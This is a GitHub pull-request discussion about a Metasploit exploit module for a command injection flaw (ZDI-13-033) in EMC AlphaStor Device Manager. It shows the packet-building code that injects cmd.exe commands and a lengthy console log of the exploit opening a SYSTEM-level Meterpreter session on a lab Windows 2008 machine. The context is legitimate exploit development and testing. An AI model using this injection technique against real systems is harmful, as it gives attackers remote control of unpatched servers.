New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Module for ZDI-13-033 Alphastor Command Injection #3756
Conversation
rescue EOFError | ||
fail_with(Failure::Unknown, "Failed to deploy CMD Stager") | ||
end | ||
disconnect |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Do you need to "ensure" this one?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
FWIW, I ensure
my disconnect
. I think it's important.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
cleanup (after fail_with) will disconnect
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Sorry for delays. Thanks for your help and thank you KernelSmith. Still
testing on 2k8
On Mon, Sep 8, 2014 at 11:34 AM, Juan Vazquez notifications@github.com
wrote:
In modules/exploits/windows/emc/alphastor_device_manager_exec.rb:
- def exploit
- execute_cmdstager({ :linemax => 487 })
- end
- def execute_command(cmd, opts)
- padding = rand_text_alpha_upper(489 - cmd.length)
- packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
- connect
- sock.put(packet)
- begin
sock.get_once
- rescue EOFError
fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
- end
- disconnect
cleanup (after fail_with) will disconnect
—
Reply to this email directly or view it on GitHub
https://github.com/rapid7/metasploit-framework/pull/3756/files#r17245521
.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
cleanup (after fail_with) will disconnect
cleanup in exploit.rb?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
No, I was speaking about Exploit::Remote::Tcp
:
def cleanup
super
disconnect
end
But yup, you're right, cleanup
on exploit.rb probably will abort the socket even before than Exploit::Remote::Tcp
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Ok thanks. Well this got my attention because at line 115, the disconnect is in an ensure block, but this one isn't. If cleanup kicks in all the time (and I think it should), then this isn't an issue.
Module looks good to me. I'll let others to reivew.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You're correct, on line 115 (send_packet
) I'm disconnecting inside an ensure
block because the rescue
block doesn't fail_with
.
In that case I want the module to continue running (even in case of Exception) and I want to be sure which disconnect
is called before returning from send_packet
.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hi Juan,
I tested your exploit on EMC Alphastor version 3 on win2k8 and it works. I
don't have access to the version of EMC you used but it works on 3 as well.
MacBook-Pro:metasploit-framework inkrypto$ ./msfconsole -q -n
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
msf > use exploit/windows/emc/emc_juan
msf exploit(emc_juan) > set rhost 192.168.34.240
rhost => 192.168.34.240
msf exploit(emc_juan) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(emc_juan) > show options
Module options (exploit/windows/emc/emc_juan):
Name Current Setting Required Description
RHOST 192.168.34.240 yes The target address
RPORT 3000 yes The target port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
EXITFUNC process yes Exit technique (accepted: seh,
thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.34.240 no The target address
Exploit target:
Id Name
0 EMC AlphaStor 4.0 < build 800 / Windows Universal
msf exploit(emc_juan) > exploit -j
[*] Exploit running as background job.
[] Started bind handler
msf exploit(emc_juan) > [] Command Stager progress - 0.46% done
(486/105647 bytes)
[] Command Stager progress - 0.92% done (972/105647 bytes)
[] Command Stager progress - 1.38% done (1458/105647 bytes)
[] Command Stager progress - 1.84% done (1944/105647 bytes)
[] Command Stager progress - 2.30% done (2430/105647 bytes)
[] Command Stager progress - 2.76% done (2916/105647 bytes)
[] Command Stager progress - 3.22% done (3402/105647 bytes)
[] Command Stager progress - 3.68% done (3888/105647 bytes)
[] Command Stager progress - 4.14% done (4374/105647 bytes)
[] Command Stager progress - 4.60% done (4860/105647 bytes)
[] Command Stager progress - 5.06% done (5346/105647 bytes)
[] Command Stager progress - 5.52% done (5832/105647 bytes)
[] Command Stager progress - 5.98% done (6318/105647 bytes)
[] Command Stager progress - 6.44% done (6804/105647 bytes)
[] Command Stager progress - 6.90% done (7290/105647 bytes)
[] Command Stager progress - 7.36% done (7776/105647 bytes)
[] Command Stager progress - 7.82% done (8262/105647 bytes)
[] Command Stager progress - 8.28% done (8748/105647 bytes)
[] Command Stager progress - 8.74% done (9234/105647 bytes)
[] Command Stager progress - 9.20% done (9720/105647 bytes)
[] Command Stager progress - 9.66% done (10206/105647 bytes)
[] Command Stager progress - 10.12% done (10692/105647 bytes)
[] Command Stager progress - 10.58% done (11178/105647 bytes)
[] Command Stager progress - 11.04% done (11664/105647 bytes)
[] Command Stager progress - 11.50% done (12150/105647 bytes)
[] Command Stager progress - 11.96% done (12636/105647 bytes)
[] Command Stager progress - 12.42% done (13122/105647 bytes)
[] Command Stager progress - 12.88% done (13608/105647 bytes)
[] Command Stager progress - 13.34% done (14094/105647 bytes)
[] Command Stager progress - 13.80% done (14580/105647 bytes)
[] Command Stager progress - 14.26% done (15066/105647 bytes)
[] Command Stager progress - 14.72% done (15552/105647 bytes)
[] Command Stager progress - 15.18% done (16038/105647 bytes)
[] Command Stager progress - 15.64% done (16524/105647 bytes)
[] Command Stager progress - 16.10% done (17010/105647 bytes)
[] Command Stager progress - 16.56% done (17496/105647 bytes)
[] Command Stager progress - 17.02% done (17982/105647 bytes)
[] Command Stager progress - 17.48% done (18468/105647 bytes)
[] Command Stager progress - 17.94% done (18954/105647 bytes)
[] Command Stager progress - 18.40% done (19440/105647 bytes)
[] Command Stager progress - 18.86% done (19926/105647 bytes)
[] Command Stager progress - 19.32% done (20412/105647 bytes)
[] Command Stager progress - 19.78% done (20898/105647 bytes)
[] Command Stager progress - 20.24% done (21384/105647 bytes)
[] Command Stager progress - 20.70% done (21870/105647 bytes)
[] Command Stager progress - 21.16% done (22356/105647 bytes)
[] Command Stager progress - 21.62% done (22842/105647 bytes)
[] Command Stager progress - 22.08% done (23328/105647 bytes)
[] Command Stager progress - 22.54% done (23814/105647 bytes)
[] Command Stager progress - 23.00% done (24300/105647 bytes)
[] Command Stager progress - 23.46% done (24786/105647 bytes)
[] Command Stager progress - 23.92% done (25272/105647 bytes)
[] Command Stager progress - 24.38% done (25758/105647 bytes)
[] Command Stager progress - 24.84% done (26244/105647 bytes)
[] Command Stager progress - 25.30% done (26730/105647 bytes)
[] Command Stager progress - 25.76% done (27216/105647 bytes)
[] Command Stager progress - 26.22% done (27702/105647 bytes)
[] Command Stager progress - 26.68% done (28188/105647 bytes)
[] Command Stager progress - 27.14% done (28674/105647 bytes)
[] Command Stager progress - 27.60% done (29160/105647 bytes)
[] Command Stager progress - 28.06% done (29646/105647 bytes)
[] Command Stager progress - 28.52% done (30132/105647 bytes)
[] Command Stager progress - 28.98% done (30618/105647 bytes)
[] Command Stager progress - 29.44% done (31104/105647 bytes)
[] Command Stager progress - 29.90% done (31590/105647 bytes)
[] Command Stager progress - 30.36% done (32076/105647 bytes)
[] Command Stager progress - 30.82% done (32562/105647 bytes)
[] Command Stager progress - 31.28% done (33048/105647 bytes)
[] Command Stager progress - 31.74% done (33534/105647 bytes)
[] Command Stager progress - 32.20% done (34020/105647 bytes)
[] Command Stager progress - 32.66% done (34506/105647 bytes)
[] Command Stager progress - 33.12% done (34992/105647 bytes)
[] Command Stager progress - 33.58% done (35478/105647 bytes)
[] Command Stager progress - 34.04% done (35964/105647 bytes)
[] Command Stager progress - 34.50% done (36450/105647 bytes)
[] Command Stager progress - 34.96% done (36936/105647 bytes)
[] Command Stager progress - 35.42% done (37422/105647 bytes)
[] Command Stager progress - 35.88% done (37908/105647 bytes)
[] Command Stager progress - 36.34% done (38394/105647 bytes)
[] Command Stager progress - 36.80% done (38880/105647 bytes)
[] Command Stager progress - 37.26% done (39366/105647 bytes)
[] Command Stager progress - 37.72% done (39852/105647 bytes)
[] Command Stager progress - 38.18% done (40338/105647 bytes)
[] Command Stager progress - 38.64% done (40824/105647 bytes)
[] Command Stager progress - 39.10% done (41310/105647 bytes)
[] Command Stager progress - 39.56% done (41796/105647 bytes)
[] Command Stager progress - 40.02% done (42282/105647 bytes)
[] Command Stager progress - 40.48% done (42768/105647 bytes)
[] Command Stager progress - 40.94% done (43254/105647 bytes)
[] Command Stager progress - 41.40% done (43740/105647 bytes)
[] Command Stager progress - 41.86% done (44226/105647 bytes)
[] Command Stager progress - 42.32% done (44712/105647 bytes)
[] Command Stager progress - 42.78% done (45198/105647 bytes)
[] Command Stager progress - 43.24% done (45684/105647 bytes)
[] Command Stager progress - 43.70% done (46170/105647 bytes)
[] Command Stager progress - 44.16% done (46656/105647 bytes)
[] Command Stager progress - 44.62% done (47142/105647 bytes)
[] Command Stager progress - 45.08% done (47628/105647 bytes)
[] Command Stager progress - 45.54% done (48114/105647 bytes)
[] Command Stager progress - 46.00% done (48600/105647 bytes)
[] Command Stager progress - 46.46% done (49086/105647 bytes)
[] Command Stager progress - 46.92% done (49572/105647 bytes)
[] Command Stager progress - 47.38% done (50058/105647 bytes)
[] Command Stager progress - 47.84% done (50544/105647 bytes)
[] Command Stager progress - 48.30% done (51030/105647 bytes)
[] Command Stager progress - 48.76% done (51516/105647 bytes)
[] Command Stager progress - 49.22% done (52002/105647 bytes)
[] Command Stager progress - 49.68% done (52488/105647 bytes)
[] Command Stager progress - 50.14% done (52974/105647 bytes)
[] Command Stager progress - 50.60% done (53460/105647 bytes)
[] Command Stager progress - 51.06% done (53946/105647 bytes)
[] Command Stager progress - 51.52% done (54432/105647 bytes)
[] Command Stager progress - 51.98% done (54918/105647 bytes)
[] Command Stager progress - 52.44% done (55404/105647 bytes)
[] Command Stager progress - 52.90% done (55890/105647 bytes)
[] Command Stager progress - 53.36% done (56376/105647 bytes)
[] Command Stager progress - 53.82% done (56862/105647 bytes)
[] Command Stager progress - 54.28% done (57348/105647 bytes)
[] Command Stager progress - 54.74% done (57834/105647 bytes)
[] Command Stager progress - 55.20% done (58320/105647 bytes)
[] Command Stager progress - 55.66% done (58806/105647 bytes)
[] Command Stager progress - 56.12% done (59292/105647 bytes)
[] Command Stager progress - 56.58% done (59778/105647 bytes)
[] Command Stager progress - 57.04% done (60264/105647 bytes)
[] Command Stager progress - 57.50% done (60750/105647 bytes)
[] Command Stager progress - 57.96% done (61236/105647 bytes)
[] Command Stager progress - 58.42% done (61722/105647 bytes)
[] Command Stager progress - 58.88% done (62208/105647 bytes)
[] Command Stager progress - 59.34% done (62694/105647 bytes)
[] Command Stager progress - 59.80% done (63180/105647 bytes)
[] Command Stager progress - 60.26% done (63666/105647 bytes)
[] Command Stager progress - 60.72% done (64152/105647 bytes)
[] Command Stager progress - 61.18% done (64638/105647 bytes)
[] Command Stager progress - 61.64% done (65124/105647 bytes)
[] Command Stager progress - 62.10% done (65610/105647 bytes)
[] Command Stager progress - 62.56% done (66096/105647 bytes)
[] Command Stager progress - 63.02% done (66582/105647 bytes)
[] Command Stager progress - 63.48% done (67068/105647 bytes)
[] Command Stager progress - 63.94% done (67554/105647 bytes)
[] Command Stager progress - 64.40% done (68040/105647 bytes)
[] Command Stager progress - 64.86% done (68526/105647 bytes)
[] Command Stager progress - 65.32% done (69012/105647 bytes)
[] Command Stager progress - 65.78% done (69498/105647 bytes)
[] Command Stager progress - 66.24% done (69984/105647 bytes)
[] Command Stager progress - 66.70% done (70470/105647 bytes)
[] Command Stager progress - 67.16% done (70956/105647 bytes)
[] Command Stager progress - 67.62% done (71442/105647 bytes)
[] Command Stager progress - 68.08% done (71928/105647 bytes)
[] Command Stager progress - 68.54% done (72414/105647 bytes)
[] Command Stager progress - 69.00% done (72900/105647 bytes)
[] Command Stager progress - 69.46% done (73386/105647 bytes)
[] Command Stager progress - 69.92% done (73872/105647 bytes)
[] Command Stager progress - 70.38% done (74358/105647 bytes)
[] Command Stager progress - 70.84% done (74844/105647 bytes)
[] Command Stager progress - 71.30% done (75330/105647 bytes)
[] Command Stager progress - 71.76% done (75816/105647 bytes)
[] Command Stager progress - 72.22% done (76302/105647 bytes)
[] Command Stager progress - 72.68% done (76788/105647 bytes)
[] Command Stager progress - 73.14% done (77274/105647 bytes)
[] Command Stager progress - 73.60% done (77760/105647 bytes)
[] Command Stager progress - 74.06% done (78246/105647 bytes)
[] Command Stager progress - 74.52% done (78732/105647 bytes)
[] Command Stager progress - 74.98% done (79218/105647 bytes)
[] Command Stager progress - 75.44% done (79704/105647 bytes)
[] Command Stager progress - 75.90% done (80190/105647 bytes)
[] Command Stager progress - 76.36% done (80676/105647 bytes)
[] Command Stager progress - 76.82% done (81162/105647 bytes)
[] Command Stager progress - 77.28% done (81648/105647 bytes)
[] Command Stager progress - 77.74% done (82134/105647 bytes)
[] Command Stager progress - 78.20% done (82620/105647 bytes)
[] Command Stager progress - 78.66% done (83106/105647 bytes)
[] Command Stager progress - 79.12% done (83592/105647 bytes)
[] Command Stager progress - 79.58% done (84078/105647 bytes)
[] Command Stager progress - 80.04% done (84564/105647 bytes)
[] Command Stager progress - 80.50% done (85050/105647 bytes)
[] Command Stager progress - 80.96% done (85536/105647 bytes)
[] Command Stager progress - 81.42% done (86022/105647 bytes)
[] Command Stager progress - 81.88% done (86508/105647 bytes)
[] Command Stager progress - 82.34% done (86994/105647 bytes)
[] Command Stager progress - 82.80% done (87480/105647 bytes)
[] Command Stager progress - 83.26% done (87966/105647 bytes)
[] Command Stager progress - 83.72% done (88452/105647 bytes)
[] Command Stager progress - 84.18% done (88938/105647 bytes)
[] Command Stager progress - 84.64% done (89424/105647 bytes)
[] Command Stager progress - 85.10% done (89910/105647 bytes)
[] Command Stager progress - 85.56% done (90396/105647 bytes)
[] Command Stager progress - 86.02% done (90882/105647 bytes)
[] Command Stager progress - 86.48% done (91368/105647 bytes)
[] Command Stager progress - 86.94% done (91854/105647 bytes)
[] Command Stager progress - 87.40% done (92340/105647 bytes)
[] Command Stager progress - 87.86% done (92826/105647 bytes)
[] Command Stager progress - 88.32% done (93312/105647 bytes)
[] Command Stager progress - 88.78% done (93798/105647 bytes)
[] Command Stager progress - 89.24% done (94284/105647 bytes)
[] Command Stager progress - 89.70% done (94770/105647 bytes)
[] Command Stager progress - 90.16% done (95256/105647 bytes)
[] Command Stager progress - 90.62% done (95742/105647 bytes)
[] Command Stager progress - 91.08% done (96228/105647 bytes)
[] Command Stager progress - 91.54% done (96714/105647 bytes)
[] Command Stager progress - 92.00% done (97200/105647 bytes)
[] Command Stager progress - 92.46% done (97686/105647 bytes)
[] Command Stager progress - 92.92% done (98172/105647 bytes)
[] Command Stager progress - 93.38% done (98658/105647 bytes)
[] Command Stager progress - 93.84% done (99144/105647 bytes)
[] Command Stager progress - 94.30% done (99630/105647 bytes)
[] Command Stager progress - 94.76% done (100116/105647 bytes)
[] Command Stager progress - 95.22% done (100602/105647 bytes)
[] Command Stager progress - 95.68% done (101088/105647 bytes)
[] Command Stager progress - 96.14% done (101574/105647 bytes)
[] Command Stager progress - 96.60% done (102060/105647 bytes)
[] Command Stager progress - 97.06% done (102546/105647 bytes)
[] Command Stager progress - 97.52% done (103032/105647 bytes)
[] Command Stager progress - 97.96% done (103493/105647 bytes)
[] Command Stager progress - 98.40% done (103959/105647 bytes)
[] Command Stager progress - 98.81% done (104388/105647 bytes)
[] Command Stager progress - 99.20% done (104807/105647 bytes)
[] Command Stager progress - 99.66% done (105289/105647 bytes)
[] Command Stager progress - 100.00% done (105647/105647 bytes)
[] Sending stage (769536 bytes) to 192.168.34.240
[*] Meterpreter session 1 opened (192.168.34.1:63984 -> 192.168.34.240:4444)
at 2014-09-19 13:25:59 -0400
msf exploit(emc_juan) > sysinfo
[-] Unknown command: sysinfo.
msf exploit(emc_juan) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN-Q2U1UDO3BDD
OS : Windows 2008 (Build 6002, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
On Tue, Sep 9, 2014 at 11:29 AM, Juan Vazquez notifications@github.com
wrote:
In modules/exploits/windows/emc/alphastor_device_manager_exec.rb:
- def exploit
- execute_cmdstager({ :linemax => 487 })
- end
- def execute_command(cmd, opts)
- padding = rand_text_alpha_upper(489 - cmd.length)
- packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
- connect
- sock.put(packet)
- begin
sock.get_once
- rescue EOFError
fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
- end
- disconnect
You're correct, on line 115 (send_packet) I'm disconnecting inside an
ensure block because the rescue block doesn't fail_with.In that case I want the module to continue running (even in case of
Exception) and I want to be sure which disconnect is called before
returning from send_packet.—
Reply to this email directly or view it on GitHub
https://github.com/rapid7/metasploit-framework/pull/3756/files#r17307778
.
Thanks for testing @inkrypto ! If you feel comfortable with this pull request going ahead, feel free to land inkrypto#1 into your repository. So #3686 will be automatically updated to split the module related to ZDI-13-033. Thanks! |
Thanks dude. Just so I am clear, put your new module in my repo and then On Mon, Sep 22, 2014 at 9:46 AM, Juan Vazquez notifications@github.com
|
@inkrypto you don't need to do it (unless you want, of course). You can just merge inkrypto#1 into your repository (at the bottom of the pull request you should see instructions for mergint). Once you merge inkrypto#1, #3686 will be automatically updated. After that, we can use #3686 to continue with the buffer overflow modules, and this one to land the command injection module. If you prefer to resubmit the module in this pull request (command injection) by yourself you can do it too! of course! I just would ask you to do a new pull request for the new module (command injection). It's easier to handle pull requests with just one module at a time. |
Ok thanks Juan, no resubmit, On Mon, Sep 22, 2014 at 4:57 PM, Juan Vazquez notifications@github.com
|
I've been working in one of the modules submitted on #3686, the one I think is more reliable because is a command injection vulnerability, not a memory corruption. Since the author has not answered to the last comments, I'm trying to help. I really wold like to see this target covered on metasploit.
Originally the module for ZDI-13-033 was submitted as Auxiliary module, this pull request converts it to an exploit module and submits it as a single pull request.
I'm also submitting a pull request to #3686 to delete the auxiliary module, since the vulnerability will be covered by this exploit.
I've tested the module on EMC Alphastor 4.0 with Win 2003 SP2 and Win 2008 R2 successfully.
@kernelsmith: would you like to test the module? If you get some time and could verify it would be supper appreciated! (no rush!)
@inkrypto, as original module author, would you like to review / check /comment / test? Also if you feel more comfortable, feel free to get the changes in this pull request and make your own pull request :) no problem at all on my side. I would close this one!